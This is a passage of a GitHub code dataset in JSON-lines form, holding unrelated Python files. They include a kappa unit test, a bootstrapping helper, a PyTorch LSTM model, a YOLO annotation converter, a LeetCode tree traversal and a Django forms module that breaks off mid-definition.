masks = self.create_ones_mask()\n sparsity = 0\n \n \n self.model.masks = masks\n self.model.sparsity = sparsity\n 
\n\n","repo_name":"elliottpiercy/prunpy","sub_path":"utils/prune/magnitude_threshold_pruning.py","file_name":"magnitude_threshold_pruning.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1979816564","text":"# -*- coding:utf-8 -*-\n\"\"\"\n ..\n ---------------------------------------------------------------------\n ___ __ __ __ ___\n / | \\ | \\ | \\ / the automatic\n \\__ |__/ |__/ |___| \\__ annotation and\n \\ | | | | \\ analysis\n ___/ | | | | ___/ of speech\n\n http://www.sppas.org/\n\n Use of this software is governed by the GNU Public License, version 3.\n\n SPPAS is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n SPPAS is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with SPPAS. If not, see .\n\n This banner notice must not be removed.\n\n ---------------------------------------------------------------------\n\n src.calculus.tests.test_kappa.py\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\"\"\"\nimport unittest\n\nfrom sppas.src.calculus.scoring.kappa import sppasKappa\n\n# ---------------------------------------------------------------------------\n\n\nclass TestVectorKappa(unittest.TestCase):\n\n def setUp(self):\n self.p = [(1.0, 0.0), (0.0, 1.0), (0.0, 1.0), (1.0, 0.0), (1.0, 0.0)]\n self.q = [(1.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 0.0), (1.0, 0.0)]\n\n def test_kappa(self):\n kappa = sppasKappa(self.p, self.q)\n self.assertTrue(kappa.check()) # check both p and q\n self.assertFalse(kappa.check_vector([(0., 1.), (0., 1., 0.)]))\n self.assertFalse(kappa.check_vector([(0.0, 0.1)]))\n v = kappa.evaluate()\n self.assertEqual(0.54545, round(v, 5))\n\n def test_kappa3(self):\n p = [(1., 0., 0.), (0., 0., 1.), (0., 1., 0.), (1., 0., 0.), (0., 0., 1.)]\n q = [(0., 0., 1.), (0., 0., 1.), (1., 0., 0.), (0., 1., 0.), (0., 0., 1.)]\n kappa = sppasKappa(p, q)\n v = kappa.evaluate()\n self.assertEqual(0.0625, round(v, 5))\n","repo_name":"mirfan899/CTTS","sub_path":"sppas/sppas/src/calculus/tests/test_kappa.py","file_name":"test_kappa.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"14398263256","text":"''' Implement bootstrapping (resampling) \n https://en.wikipedia.org/wiki/Bootstrapping_(statistics)\n'''\n\nimport random\nimport numpy as np\n\ndef boot_strapped_quantiles( data, f, n, quantiles = [0.0445, 0.3173, 0.5, 1-0.3173, 1-0.0445]):\n ''' make n replica data sets (of the same size) by random sampling the original data with replacements.\n Evaluate a function on the replicas and compute the quantiles of the results.''' \n replica_values = sorted(map( f, ( [random.choice(data) for _ in range(len(data))] for _ in range(n) ) ) )\n return [ np.quantile( replica_values, q ) for q in quantiles ]\n\nif __name__ == \"__main__\":\n\n n = 1000\n sample = [ random.gauss(0,1) for i in range(1000) ]\n mean = lambda data:sum(data)/float(len(data))\n\n quantiles = boot_strapped_quantiles( sample, mean, 1000 )\n 
\n","repo_name":"HephyAnalysisSW/TMB","sub_path":"plots/plotsNiki/bootstrapping.py","file_name":"bootstrapping.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35952953595","text":"# Uses python3\n# There are two ways of running this program:\n# 1. Run\n# python3 APlusB.py\n# then enter two numbers and press ctrl-d/ctrl-z\n# 2. Save two numbers to a file -- say, dataset.txt.\n# Then run\n# python3 APlusB.py < dataset.txt\n\nimport sys\n\n\nclass AplusB:\n def add_numbers(self, vala, valb):\n return vala + valb\n\n\ndef main():\n values = sys.stdin.read()\n tokens = values.split()\n a = int(tokens[0])\n b = int(tokens[1])\n\n print(AplusB().add_numbers(a, b))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"seanfeehan/algorithmictoolbox","sub_path":"AplusB/AplusB.py","file_name":"AplusB.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26687625099","text":"# Simple Rendering Aspect for 38Engine\n# Sushil Louis\n\n#from vector import Vector3\nimport utils\nimport math\nimport ogre.renderer.OGRE as ogre\n\nclass Renderer:\n def __init__(self, ent):\n self.ent = ent\n #print \"Rendering seting up for: \", str(self.ent)\n self.gent = self.ent.engine.gfxMgr.sceneManager.createEntity(self.ent.uiname + \"_ogreEnt\", self.ent.mesh)\n #self.gent.setMaterialName(self.ent.material)\n self.node = self.ent.engine.gfxMgr.sceneManager.getRootSceneNode().createChildSceneNode(self.ent.uiname + 'node', ent.pos)\n self.node.attachObject(self.gent)\n #self.node.setScale(self.ent.scale,self.ent.scale,self.ent.scale)\n \n \n def tick(self, dtime):\n #----------update scene node position and orientation-----------------------------------\n self.node.setPosition(self.ent.pos)\n self.node.resetOrientation()\n self.node.yaw(ogre.Radian(self.ent.heading))\n #if self.ent.isSelected:\n # self.node.showBoundingBox(True)\n #else:\n # self.node.showBoundingBox(False)\n\n","repo_name":"jflorespadilla/SchoolProjects","sub_path":"python/cs381_GameDevPipeline/StumpysGrove/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31897192256","text":"import torch\nfrom torch import nn\n\n\nclass ShallowRegressionLSTM(nn.Module):\n '''https://www.crosstab.io/articles/time-series-pytorch-lstm/'''\n\n def __init__(self, num_features, hidden_units):\n super().__init__()\n self.num_sensors = num_features # this is the number of features\n self.hidden_units = hidden_units\n self.num_layers = 1\n\n self.lstm = nn.LSTM(\n input_size=num_features,\n hidden_size=hidden_units,\n batch_first=True,\n num_layers=self.num_layers\n )\n\n self.linear = nn.Linear(in_features=self.hidden_units, out_features=1)\n\n def forward(self, x):\n batch_size = x.shape[0]\n h0 = torch.zeros(self.num_layers, batch_size,\n self.hidden_units).requires_grad_()\n c0 = torch.zeros(self.num_layers, batch_size,\n self.hidden_units).requires_grad_()\n\n _, (hn, _) = self.lstm(x, (h0, c0))\n # First dim of Hn is num_layers, which is set to 1 above.\n out = self.linear(hn[0]).flatten()\n\n return 
out\n","repo_name":"ebron01/pump-project","sub_path":"code/models/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27433438536","text":"import os\nimport csv\n\n\nTARGET_IMAGE_SIZE = 832\n\ninput_path = '/opt/ml/processing/input/annotations/'\noutput_path = '/opt/ml/processing/output/{}/annotations/'.format(TARGET_IMAGE_SIZE)\n\nif not os.path.exists(output_path):\n os.makedirs(output_path)\n\n\ncolumns = ['file_name', 'x1', 'y1', 'x2', 'y2', 'class', 'image_width', 'image_height']\n\nfor group in ['train', 'val', 'test']:\n\n input_file = \"annotations_\" + group + \".csv\"\n with open(os.path.join(input_path, input_file), 'r', newline='') as csvfile:\n\n data = csv.DictReader(csvfile, fieldnames=columns)\n\n for row in data:\n\n x_center = int(row['x1']) + int(row['x2']) / 2.0\n y_center = int(row['y1']) + int(row['y2']) / 2.0\n obj_width = int(row['x2']) - int(row['x1'])\n obj_height = int(row['y2']) - int(row['y1'])\n\n x = round(x_center / int(row['image_width']), 8)\n y = round(y_center / int(row['image_height']), 8)\n w = round(obj_width / int(row['image_width']), 8)\n h = round(obj_height / int(row['image_height']), 8)\n\n output_row = f'0 {x} {y} {w} {h}\\n'\n\n image_name, _ = os.path.splitext(row['file_name'])\n output_file = image_name + '.txt'\n\n with open(os.path.join(output_path, output_file), 'a') as output_file:\n output_file.write(output_row)\n","repo_name":"solita/aiga-mlops-pipeline-aws","sub_path":"preprocessing/sagemaker/reannotate_images.py","file_name":"reannotate_images.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25488781043","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/binary-tree-level-order-traversal/\n# Author: Miao Zhang\n# Date: 2021-01-18\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n res = []\n if root is None: \n return res\n queue = deque()\n queue.append(root)\n while queue:\n n = len(queue)\n tmp = []\n for _ in range(n):\n node = queue.popleft()\n tmp.append(node.val)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n res.append(tmp)\n return res\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/binaryTreeLevelOrderTraversal/binaryTreeLevelOrderTraversal.py","file_name":"binaryTreeLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3471233268","text":"'https://www.guru99.com/python-regular-expressions-complete-tutorial.html'\n\n'''\nre.match() function of re in Python will search the regular expression pattern at the BEGINNING of the string and return the first occurrence. \nThe Python RegEx Match method checks for a match only at the beginning of the string. \nSo, if a match is found in the first line, it returns the match object. \nBut if a match is found in some other line, the Python RegEx Match function returns null.\n\nFor example, consider the following code of Python re.match() function. 
\nThe expression “w+” and “\\W” will match the words starting with letter ‘g’ and thereafter, anything which is not started with ‘g’ is not identified. \nTo check match for each element in the list or string, we run the for loop in this Python re.match() Example.\n'''\n\nimport re\n\nmy_list = ['guru99 get', 'guru99 give', 'guru Selenium']\n\nfor item in my_list:\n z = re.match('(g\\w+)\\W(g\\w+)', item)\n \n if z:\n print(z.groups())","repo_name":"H0r4c3/Python_00_ALL","sub_path":"Regex/re.match().py","file_name":"re.match().py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24459708100","text":"from crispy_forms.bootstrap import FormActions\nfrom crispy_forms.layout import Submit, Layout, Fieldset, HTML\nfrom django.forms import ModelForm, inlineformset_factory\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.models import User\nfrom django import forms\n\nfrom .models import City, Institution, Person, UserProfileInfo\nfrom .models import *\nfrom utils.view_util import generate_num\nfrom crispy_forms.helper import FormHelper\nfrom django_select2 import forms as s2forms\nfrom django.forms.widgets import ClearableFileInput\n\n\n# Widgets\nclass InstitutionTypeWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass InstitutionTypeWidgetMulti(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass CityWidget(s2forms.ModelSelect2Widget):\n search_fields = ['name__icontains']\n\n\nclass NeighbourhoodWidget(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n 'neighbourhood_number__icontains',\n 'city__name__icontains',\n ]\n\n\nclass NeighbourhoodWidget2(s2forms.ModelSelect2Widget): # this is for o\n search_fields = [\n 'neighbourhood_number__icontains',\n 'city__name__icontains',\n ]\n\n\nclass ReligionWidget(s2forms.ModelSelect2Widget):\n search_fields = ['name__icontains']\n\n\nclass SecondaryLiteratureWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n \"title__icontains\",\n \"author__icontains\",\n ]\n\n\nclass SecondaryLiteratureWidgetMulti(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n \"title__icontains\",\n \"author__icontains\",\n ]\n\n\nclass EvidenceWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n \"title__icontains\",\n \"author__icontains\",\n \"un_title__icontains\",\n \"un_author__icontains\",\n ]\n\n\nclass EvidenceWidgetMulti(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n \"title__icontains\",\n \"author__icontains\",\n \"un_title__icontains\",\n \"un_author__icontains\",\n ]\n\n\nclass WatersystemWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'original_term__icontains',\n 'un_original_term__icontains',\n ]\n\n\nclass WatersystemWidgetMulti(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n 'original_term__icontains',\n 'un_original_term__icontains',\n ]\n\n\nclass PurposeWidget(s2forms.ModelSelect2MultipleWidget):\n model = Purpose\n search_fields = ['name__icontains']\n\n\nclass InstallationWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass InstitutionWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass PersonWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass 
StyleWidget(s2forms.ModelSelect2Widget):\n search_fields = ['name__icontains', ]\n\n\n# User form\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput())\n\n class Meta():\n model = User\n fields = ('username', 'email', 'password')\n\n\nclass UserProfileInfoForm(forms.ModelForm):\n class Meta():\n model = UserProfileInfo\n # fields = ('portfolio_site', 'profile_pic')\n fields = ()\n\n\n#\nclass CityForm(ModelForm):\n class Meta:\n model = City\n fields = ['name', 'latitude', 'longitude']\n # its possible to use following line for all fields, also exclude\n # fields = '__all__'\n labels = {\n 'name': 'City Name'\n }\n\n def __init__(self, *args, **kwargs):\n super(CityForm, self).__init__(*args, **kwargs)\n # self.fields['country'].empty_label = \"Select\"\n self.fields['latitude'].required = False\n self.fields['longitude'].required = False\n self.helper = FormHelper()\n\n\nclass InstitutionForm(ModelForm):\n class Meta:\n model = Institution\n fields = '__all__'\n\n type = forms.ModelChoiceField(\n queryset=InstitutionType.objects.all(),\n # this line refreshes the list when a new item is entered using the plus button\n widget=InstitutionTypeWidget(\n attrs={'data-placeholder': 'Select institution type',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n\n type_many = forms.ModelMultipleChoiceField(\n queryset=InstitutionType.objects.all(),\n widget=InstitutionTypeWidgetMulti(\n attrs={'data-placeholder': 'Select institution type',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n purpose = forms.ModelMultipleChoiceField(\n queryset=Purpose.objects.all(),\n widget=PurposeWidget(\n attrs={'data-placeholder': 'Select purposes',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n city = forms.ModelChoiceField(\n queryset=City.objects.all(),\n widget=CityWidget(\n attrs={'data-placeholder': 'Select city',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n neighbourhood = forms.ModelMultipleChoiceField(\n queryset=Neighbourhood.objects.all(),\n widget=NeighbourhoodWidget(\n attrs={'data-placeholder': 'Select neighbourhood',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n latitude = forms.DecimalField(max_digits=8, decimal_places=5,\n widget=forms.NumberInput(attrs={'placeholder': 'Latitude'}))\n longitude = forms.DecimalField(max_digits=8, decimal_places=5,\n widget=forms.NumberInput(attrs={'placeholder': 'Longitude'}))\n start_date_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n start_date_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n first_reference_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n first_reference_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n end_date_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n end_date_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n religion = forms.ModelChoiceField(\n queryset=Religion.objects.all(),\n widget=ReligionWidget(\n attrs={'data-placeholder': 'Select religion',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n 
secondary_literature = forms.ModelMultipleChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidgetMulti(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n comment = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n\n status = forms.BooleanField()\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get('instance', None)\n super(InstitutionForm, self).__init__(*args, **kwargs)\n self.fields['type_many'].required = False\n self.fields['city'].required = False\n self.fields['neighbourhood'].required = False\n self.fields['latitude'].required = False\n self.fields['longitude'].required = False\n self.fields['start_date_lower'].required = False\n self.fields['start_date_upper'].required = False\n self.fields['first_reference_lower'].required = False\n self.fields['first_reference_upper'].required = False\n self.fields['end_date_lower'].required = False\n self.fields['end_date_upper'].required = False\n self.fields['religion'].required = False\n self.fields['secondary_literature'].required = False\n self.fields['status'].required = False\n\n if not instance:\n self.initial['name'] = 'Institution-' + str(generate_num('installations', 'Institution')).zfill(4)\n\n\nclass PersonForm(ModelForm):\n class Meta:\n model = Person\n fields = '__all__'\n widgets = {\n \"religion\": ReligionWidget(attrs={'data-placeholder': 'Select religion',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n \"evidence\": EvidenceWidget(attrs={'data-placeholder': 'Select evidence',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n }\n\n birth_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n birth_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n death_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n death_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n secondary_literature = forms.ModelMultipleChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidgetMulti(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n comment = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n status = forms.BooleanField()\n\n def __init__(self, *args, **kwargs):\n super(PersonForm, self).__init__(*args, **kwargs)\n self.fields['gender'].required = False\n self.fields['secondary_literature'].required = False\n self.fields['birth_lower'].required = False\n self.fields['birth_upper'].required = False\n self.fields['death_lower'].required = False\n self.fields['death_upper'].required = False\n self.fields['status'].required = False\n # self.fields['religion'].empty_label = \"Select religion\"\n self.fields['secondary_literature'].empty_label = \"Select secondary literature\"\n self.fields['gender'].empty_label = \"Select gender\"\n\n\nclass SecondaryLiteratureForm(ModelForm):\n class Meta:\n model = SecondaryLiterature\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(SecondaryLiteratureForm, self).__init__(*args, **kwargs)\n self.fields['journal'].required = False\n 
self.fields['publisher'].required = False\n self.fields['year'].required = False\n self.fields['status'].required = False\n\n\nclass InstallationForm(ModelForm):\n watersystem = forms.ModelChoiceField(\n queryset=Watersystem.objects.all(), # this line refreshes the list when new item is entered using plus button\n widget=WatersystemWidget(\n attrs={'data-placeholder': 'Select a water system',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n construction_date_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n construction_date_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n first_reference_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n first_reference_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n end_functioning_year_lower = forms.CharField(\n widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n end_functioning_year_upper = forms.CharField(\n widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n purpose = forms.ModelMultipleChoiceField(\n queryset=Purpose.objects.all().order_by('name'),\n widget=PurposeWidget(\n attrs={'data-placeholder': 'Select purposes',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n city = forms.ModelChoiceField(\n queryset=City.objects.all(),\n widget=CityWidget(\n attrs={'data-placeholder': 'Select city',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n neighbourhood = forms.ModelMultipleChoiceField(\n queryset=Neighbourhood.objects.all(),\n widget=NeighbourhoodWidget(\n attrs={'data-placeholder': 'Select neighbourhood',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n latitude = forms.DecimalField(max_digits=8, decimal_places=5,\n widget=forms.NumberInput(attrs={'placeholder': 'Latitude'}))\n longitude = forms.DecimalField(max_digits=8, decimal_places=5,\n widget=forms.NumberInput(attrs={'placeholder': 'Longitude'}))\n institution_as_location = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution as location ',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n extent_shapefile = forms.FileField(widget=forms.ClearableFileInput)\n secondary_literature = forms.ModelMultipleChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidgetMulti(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n comment = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n\n status = forms.BooleanField()\n\n class Meta:\n model = Installation\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get('instance', None)\n super(InstallationForm, self).__init__(*args, **kwargs)\n self.fields['watersystem'].required = False\n self.fields['construction_date_lower'].required = False\n self.fields['construction_date_upper'].required = False\n self.fields['first_reference_lower'].required = False\n self.fields['first_reference_upper'].required = False\n self.fields['end_functioning_year_lower'].required = False\n 
self.fields['end_functioning_year_upper'].required = False\n self.fields['purpose'].required = False\n self.fields['city'].required = False\n self.fields['neighbourhood'].required = False\n self.fields['latitude'].required = False\n self.fields['longitude'].required = False\n self.fields['institution_as_location'].required = False\n self.fields['extent_shapefile'].required = False\n self.fields['secondary_literature'].required = False\n self.fields['comment'].required = False\n self.fields['status'].required = False\n\n if not instance:\n self.initial['name'] = 'Installation-' + str(generate_num('installations', 'Installation')).zfill(4)\n\n\nclass EvidenceForm(ModelForm):\n date_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n date_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n secondary_literature = forms.ModelChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidget(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n status = forms.BooleanField()\n\n class Meta:\n model = Evidence\n fields = ('title', 'author', 'date_lower', 'date_upper', 'secondary_literature', 'description', 'status')\n\n def __init__(self, *args, **kwargs):\n super(EvidenceForm, self).__init__(*args, **kwargs)\n self.fields['author'].required = False\n self.fields['date_lower'].required = False\n self.fields['date_upper'].required = False\n self.fields['status'].required = False\n\n\n# Landmarks\nclass FigureForm(ModelForm):\n style = forms.ModelChoiceField(\n queryset=Style.objects.all(),\n widget=StyleWidget(\n attrs={'data-placeholder': 'Select style',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n start_date = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'start date'}))\n\n end_date = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'end date'}))\n neighbourhood = forms.ModelMultipleChoiceField(\n queryset=Neighbourhood.objects.all(),\n widget=NeighbourhoodWidget(\n attrs={'data-placeholder': 'Select neighbourhood',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n city = forms.ModelChoiceField(\n queryset=City.objects.all(),\n widget=CityWidget(\n attrs={'data-placeholder': 'Select city',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 4}))\n\n class Meta:\n model = Figure\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get('instance', None)\n super(FigureForm, self).__init__(*args, **kwargs)\n self.fields['style'].required = True\n self.fields['start_date'].required = False\n self.fields['end_date'].required = False\n self.fields['city'].required = False\n self.fields['description'].required = False\n self.fields['neighbourhood'].required = False\n self.fields['geojson'].required = True\n\n\nclass WatersystemForm(ModelForm):\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}))\n secondary_literature = forms.ModelChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidget(\n 
attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = Watersystem\n fields = ('original_term', 'type', 'secondary_literature', 'description')\n\n def __init__(self, *args, **kwargs):\n super(WatersystemForm, self).__init__(*args, **kwargs)\n self.fields['type'].required = False\n self.fields['secondary_literature'].required = False\n self.fields['description'].required = False\n\n\nclass WatersystemCategoriesForm(ModelForm):\n watersystem = forms.ModelMultipleChoiceField(\n queryset=Watersystem.objects.all(),\n widget=WatersystemWidgetMulti(\n attrs={'data-placeholder': 'Select water systems',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n\n class Meta:\n model = WatersystemCategories\n fields = ('name', 'watersystem', 'description')\n\n def __init__(self, *args, **kwargs):\n super(WatersystemCategoriesForm, self).__init__(*args, **kwargs)\n self.fields['name'].required = True\n self.fields['watersystem'].required = False\n self.fields['description'].required = False\n\n\nclass NeighbourhoodForms(ModelForm):\n extent_shapefile = forms.FileField(widget=forms.ClearableFileInput)\n\n style = forms.ModelChoiceField(\n queryset=Style.objects.all(),\n widget=StyleWidget(\n attrs={'data-placeholder': 'Select style',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = Neighbourhood\n fields = ('city', 'neighbourhood_number', 'style', 'extent_shapefile')\n\n def __init__(self, *args, **kwargs):\n super(NeighbourhoodForms, self).__init__(*args, **kwargs)\n self.fields['style'].required = False\n\n\nclass InstitutionTypeForms(ModelForm):\n name = forms.CharField()\n\n class Meta:\n model = InstitutionType\n fields = ('name', 'description')\n\n\n# Relations form\nclass CityPersonRelationForm(ModelForm):\n city = forms.ModelChoiceField(\n queryset=City.objects.all(),\n widget=CityWidget(\n attrs={'data-placeholder': 'Select city',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = CityPersonRelation\n fields = ('city', 'person', 'type_of_involvement')\n # widget = {\n # \"city\": CityWidget,\n # }\n\n\nclass NeighbourhoodPersonRelationForm(ModelForm):\n person = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n neighbourhood = forms.ModelChoiceField(\n queryset=Neighbourhood.objects.all(),\n widget=NeighbourhoodWidget2(\n attrs={'data-placeholder': 'Select neighbourhood',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = NeighbourhoodPersonRelation\n fields = ('neighbourhood', 'person', 'type_of_involvement')\n\n\nclass PersonInstitutionRelationForm(ModelForm):\n person = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select a person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n institution = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 
